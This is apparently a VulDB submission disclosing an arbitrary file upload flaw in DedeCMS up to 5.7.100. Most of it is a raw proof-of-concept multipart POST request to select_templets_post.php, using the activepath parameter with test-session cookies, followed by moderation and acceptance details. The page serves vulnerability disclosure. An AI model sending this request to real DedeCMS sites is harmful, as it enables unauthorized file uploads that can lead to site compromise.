Submit #206433: dedeCMS has a logic flaw that causes arbitrary file uploads

Title: dedeCMS has a logic flaw that causes arbitrary file uploads
Description: POC

POST /include/dialog/select_templets_post.php HTTP/1.1
Host: dede.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------59698619541674634093520637807
Content-Length: 821
Origin: http://dede.com
Connection: close
Referer: http://dede.com/include/dialog/select_templets.php?&activepath=%2Ftemplets%2Fplus&f=form1.templet
Cookie: PHPSESSID=7aojpo4e5kuvg8g5jokphrds52; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=1b47eac98453ada5; DedeLoginTime=1693981005; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=3cfe4db1e215919a; _csrf_name_35a8e786=0925065ac6fc01dd9093ec5507d4c2b6; _csrf_name_35a8e7861BH21ANI1AGD297L1FF21LN02BGE1DNG=65437f2a75024ae2
Upgrade-Insecure-Requests: 1

-----------------------------59698619541674634093520637807
Content-Disposition: form-data; name="activepath"

/member
-----------------------------59698619541674634093520637807
Content-Disposition: form-data; name="f"

form1.templet
-----------------------------59698619541674634093520637807
Content-Disposition: form-data; name="job"

upload
-----------------------------59698619541674634093520637807
Content-Disposition: form-data; name="uploadfile"; filename="ez_pz.py.txt"
Content-Type: text/x-python

1
-----------------------------59698619541674634093520637807
Content-Disposition: form-data; name="filename"

123.txt
-----------------------------59698619541674634093520637807
Content-Disposition: form-data; name="sb1"

确定
-----------------------------59698619541674634093520637807--

Source: ⚠️ https://github.com/bayuncao/DEDEcms
User: bayuncao (UID 50143)
Submission: 11.09.2023 06:45 (3 years ago)
Moderation: 16.09.2023 09:52 (5 days later)
Status: Accepted
VulDB entry: 239863 [DedeCMS up to 5.7.100 select_templets_post.php activepath privilege escalation]
Points: 20